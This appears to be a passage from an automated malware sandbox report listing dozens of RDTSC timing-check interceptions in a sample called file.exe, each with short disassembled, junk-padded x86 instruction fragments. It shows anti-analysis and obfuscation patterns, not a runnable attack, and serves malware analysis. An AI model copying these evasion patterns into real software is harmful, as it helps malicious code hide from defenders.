              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB2D5 second address: 6AB319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov esi, 5A481C74h 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D346Eh] 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007FF8A95A6CB8h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000016h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jnl 00007FF8A95A6CB8h 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB319 second address: 6AB31F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB31F second address: 6AB323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB323 second address: 6AB342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB342 second address: 6AB347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AB347 second address: 6AB34E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACE59 second address: 6ACE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FF8A95A6CC8h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6ACE7A second address: 6ACECA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007FF8A909BC18h 0x0000000f popad 0x00000010 nop 0x00000011 sub dword ptr [ebp+122D281Ah], edx 0x00000017 push 00000000h 0x00000019 adc edi, 32F08F40h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007FF8A909BC18h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b push eax 0x0000003c push esi 0x0000003d push edi 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD8F0 second address: 6AD8F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AD8F4 second address: 6AD974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007FF8A909BC18h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 jng 00007FF8A909BC1Ch 0x00000029 xor edi, dword ptr [ebp+122D2875h] 0x0000002f push 00000000h 0x00000031 jl 00007FF8A909BC16h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007FF8A909BC18h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 00000019h 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov edi, 25095C00h 0x00000058 push eax 0x00000059 jl 00007FF8A909BC2Fh 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FF8A909BC1Dh 0x00000066 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AECE2 second address: 6AED2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FF8A95A6CB8h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000018h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 push 00000000h 0x00000023 mov esi, dword ptr [ebp+122D3816h] 0x00000029 push 00000000h 0x0000002b pushad 0x0000002c mov dword ptr [ebp+122D34E0h], edx 0x00000032 mov cx, si 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 push ebx 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FF8A95A6CBBh 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AED2D second address: 6AED31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AF622 second address: 6AF629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65992B second address: 659966 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF8A909BC28h 0x00000008 jmp 00007FF8A909BC1Ch 0x0000000d ja 00007FF8A909BC16h 0x00000013 jmp 00007FF8A909BC1Ah 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push edx 0x0000001e pop edx 0x0000001f push edi 0x00000020 pop edi 0x00000021 jbe 00007FF8A909BC16h 0x00000027 popad 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFF10 second address: 6AFF1A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8A95A6CBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 659966 second address: 65996B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F6F7 second address: 66F6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F6FB second address: 66F71A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF8A909BC1Bh 0x0000000b push edi 0x0000000c jo 00007FF8A909BC16h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66F71A second address: 66F71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B370B second address: 6B370F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B370F second address: 6B3713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4CB8 second address: 6B4CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 or ebx, dword ptr [ebp+122D38C2h] 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007FF8A909BC18h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 movsx ebx, di 0x0000002c push 00000000h 0x0000002e mov edi, ecx 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4CF0 second address: 6B4CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4CF4 second address: 6B4D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FF8A909BC1Fh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop edi 0x00000016 pushad 0x00000017 jmp 00007FF8A909BC29h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5BA1 second address: 6B5BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B4F6A second address: 6B4F86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF8A909BC27h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7A90 second address: 6B7AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF8A95A6CB6h 0x0000000a pop edi 0x0000000b jmp 00007FF8A95A6CBFh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5D02 second address: 6B5D08 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5D08 second address: 6B5D12 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF8A95A6CBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B5D12 second address: 6B5D23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FF8A909BC20h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B80A2 second address: 6B810E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 ja 00007FF8A95A6CCDh 0x0000000f je 00007FF8A95A6CC7h 0x00000015 jmp 00007FF8A95A6CC1h 0x0000001a nop 0x0000001b sub dword ptr [ebp+122DB641h], ecx 0x00000021 mov di, 40E8h 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FF8A95A6CB8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 and edi, dword ptr [ebp+122D3916h] 0x00000049 pushad 0x0000004a xor dword ptr [ebp+12457DF4h], edx 0x00000050 popad 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jnl 00007FF8A95A6CB8h 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9050 second address: 6B9054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B9054 second address: 6B905E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8217 second address: 6B821E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B905E second address: 6B9062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA014 second address: 6BA01E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8A909BC1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA01E second address: 6BA02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA02A second address: 6BA03B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Ch 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA03B second address: 6BA04D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A95A6CBEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA04D second address: 6BA099 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub bx, 4E00h 0x0000000e push ecx 0x0000000f push edx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 push 00000000h 0x00000014 jnp 00007FF8A909BC1Ch 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push esi 0x0000001f call 00007FF8A909BC18h 0x00000024 pop esi 0x00000025 mov dword ptr [esp+04h], esi 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc esi 0x00000032 push esi 0x00000033 ret 0x00000034 pop esi 0x00000035 ret 0x00000036 or bx, C9F2h 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 pushad 0x00000041 popad 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA099 second address: 6BA09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA09D second address: 6BA0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA0A3 second address: 6BA0A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA0A8 second address: 6BA0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB07E second address: 6BB084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB084 second address: 6BB088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB088 second address: 6BB08C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA1D6 second address: 6BA1F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA1F4 second address: 6BA1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA1F8 second address: 6BA1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA2B7 second address: 6BA2BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA2BC second address: 6BA2D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A909BC1Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007FF8A909BC20h 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB2A1 second address: 6BB2A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB2A5 second address: 6BB2AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC22A second address: 6BC22E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC22E second address: 6BC234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BC234 second address: 6BC2BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF8A95A6CBCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add dword ptr [ebp+12471DCCh], edx 0x00000013 push dword ptr fs:[00000000h] 0x0000001a push 00000000h 0x0000001c push ebx 0x0000001d call 00007FF8A95A6CB8h 0x00000022 pop ebx 0x00000023 mov dword ptr [esp+04h], ebx 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc ebx 0x00000030 push ebx 0x00000031 ret 0x00000032 pop ebx 0x00000033 ret 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b jnp 00007FF8A95A6CB7h 0x00000041 mov eax, dword ptr [ebp+122D1655h] 0x00000047 movzx ebx, dx 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push ebp 0x0000004f call 00007FF8A95A6CB8h 0x00000054 pop ebp 0x00000055 mov dword ptr [esp+04h], ebp 0x00000059 add dword ptr [esp+04h], 00000015h 0x00000061 inc ebp 0x00000062 push ebp 0x00000063 ret 0x00000064 pop ebp 0x00000065 ret 0x00000066 jmp 00007FF8A95A6CBAh 0x0000006b nop 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 popad 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE06D second address: 6BE0EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF8A909BC23h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jno 00007FF8A909BC1Eh 0x00000011 nop 0x00000012 jmp 00007FF8A909BC24h 0x00000017 mov di, 9B98h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007FF8A909BC18h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 stc 0x00000038 push 00000000h 0x0000003a xor dword ptr [ebp+122D34C3h], esi 0x00000040 mov edi, 43EC44A8h 0x00000045 xchg eax, esi 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 jnc 00007FF8A909BC16h 0x0000004f jne 00007FF8A909BC16h 0x00000055 popad 0x00000056 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE0EE second address: 6BE105 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FF8A95A6CB6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jc 00007FF8A95A6CB6h 0x00000016 pop ecx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE248 second address: 6BE24C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BE325 second address: 6BE32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2D8D second address: 6C2E47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8A909BC24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov bx, 3A76h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jmp 00007FF8A909BC27h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov eax, dword ptr [ebp+122D16F9h] 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007FF8A909BC18h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov edi, 468AA1DEh 0x00000048 push FFFFFFFFh 0x0000004a push 00000000h 0x0000004c push edx 0x0000004d call 00007FF8A909BC18h 0x00000052 pop edx 0x00000053 mov dword ptr [esp+04h], edx 0x00000057 add dword ptr [esp+04h], 0000001Ch 0x0000005f inc edx 0x00000060 push edx 0x00000061 ret 0x00000062 pop edx 0x00000063 ret 0x00000064 jmp 00007FF8A909BC29h 0x00000069 push eax 0x0000006a jc 00007FF8A909BC24h 0x00000070 push eax 0x00000071 push edx 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2E47 second address: 6C2E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3DD5 second address: 6C3DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3DD9 second address: 6C3DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3DDF second address: 6C3DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF8A909BC1Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3DEF second address: 6C3DF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3EC5 second address: 6C3EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC4E second address: 66DC52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC52 second address: 66DC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC5C second address: 66DC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF8A95A6CBDh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC6D second address: 66DC71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC71 second address: 66DC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC79 second address: 66DC7E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66DC7E second address: 66DC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C249 second address: 66C24F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C24F second address: 66C259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF8A95A6CB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C259 second address: 66C25D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66C25D second address: 66C268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
